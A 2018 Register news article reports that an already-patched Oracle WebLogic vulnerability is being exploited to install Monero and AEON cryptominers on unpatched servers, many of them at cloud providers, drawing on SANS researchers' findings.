Oracle WebLogic hole primed to pump Monero

Careless cloud customers neglect patch, allowing crypto miners to move in

By Thomas Claburn in San Francisco

Posted in Data Centre, 9th January 2018 20:59 GMT

An Oracle WebLogic vulnerability fixed in October last year is being exploited on unpatched machines to mine Monero, a cryptocurrency, and other lesser-known imaginary coins.

Writing for the the SANS Technology Institute, Renato Marinho, chief research officer at Morphus Labs, on Monday said a recently disclosed software bug – specifically, poor input sanitization in wls-wsat, a WebLogic component – can be exploited to allow an unauthenticated attacker to run arbitrary commands with server user privileges.

The vulnerability also affects Oracle's PeopleSoft software, which can include WebLogic as a server.

In a follow-up post on Tuesday by Johannes B. Ullrich, SANS Dean of Research, explained that a proof of concept exploit was published by Lian Zhang, a Chinese security researcher, on his blog in December. By the end of that month, he said, a working exploit designed to install cryptomining code began showing up.

The exploit downloads a bash file that chooses a suitable working directory, kills active crypto mining on the system, and creates a CRON job to download new mining code, identified as either XMRig or fs-manager.

Eye off the ball

The attack appears to be difficult to miss because it also kills the WebLogic service on the target machine. But at cloud providers, evidently, customers aren't paying very close attention.

Ullrich says a log from a compromised system covering the five day period from January 4th through January 9th this year shows 722 affected IP addresses at various locations around the world.

Many of the affected hosts are at cloud service providers: ~144 at Amazon Web Services, ~41 at Digital Ocean, ~33 at Google Cloud, ~30 at Microsoft Azure, ~30 at Oracle Cloud, and ~17 at OVH.

"This isn’t a surprise since many organizations are moving their most critical data to the cloud to make it easier for the bad guys to get to it," quipped Ullrich.

Ullrich said XMRig is legitimate crypto-mining code, and recounted Marinho's recovery of a configuration file showing one miner managed to collect 611 Monero coins, worth about $226,070 in theory.

However, that purse appears to have been collected over a long period of time, perhaps through other avenues, because the user's 450 KH/s hash rate could only generate about $31,000 in fantasy coins a month.

Marinho also found files for another group's attempt to use the same vulnerability to mine AEON, a lesser known cryptocurrency.

Rather wryly, Ullrich observed, "Even though they are achieving a similar hash rate, they only earned about $6,000 so far. Maybe they will switch to Monero after reading this." ®

Sign up to our NewsletterGet IT in your inbox daily


More from The Register

Umm, Oracle – about that patch? It might not be very sticky ...

Security researcher says WebLogic fix can be bypassed, posts proof-of-concept

Due to Oracle being Oracle, Eclipse holds poll to rename Java EE (No, it won't be Java McJava Face)

Nor C-- or Should Have Used Go or Screw Ellison...

Terix boss thrown in the cooler for TWO years for peddling pirated Oracle firmware, code patches

Big Red all smiles after black-market support biz bosses jailed

Platinum partner had 'affair' with my wife – then Oracle screwed me, ex-sales boss claims

Regional director takes giant to court in discrimination row

Oracle tells tales about Google data slurps to Australian regulator

At an inquiry into news and ads, of all things. Is Big Red playing a deeper game?

Oracle whips out the swatter, squishes 254 security bugs in its gear

Java fixes lobbed out, Spectre Solaris patches issued

Oracle Access Manager is a terrible doorman: Get patching this bug

Security tool can be gamed to let any old riffraff into data

Oracle pledges annual Solaris updates for you to install each summer

And a plan to have users of Sun hardware upgrade if they want Solaris 11.4 and proper patches

And Oracle E-biz suite makes 3: Package also vulnerable to exploit used by cryptocurrency miner

Hat trick!

Hurry up patching those Oracle bugs: Attackers aren't waiting

Honeypots swarmed on within three hours of patch release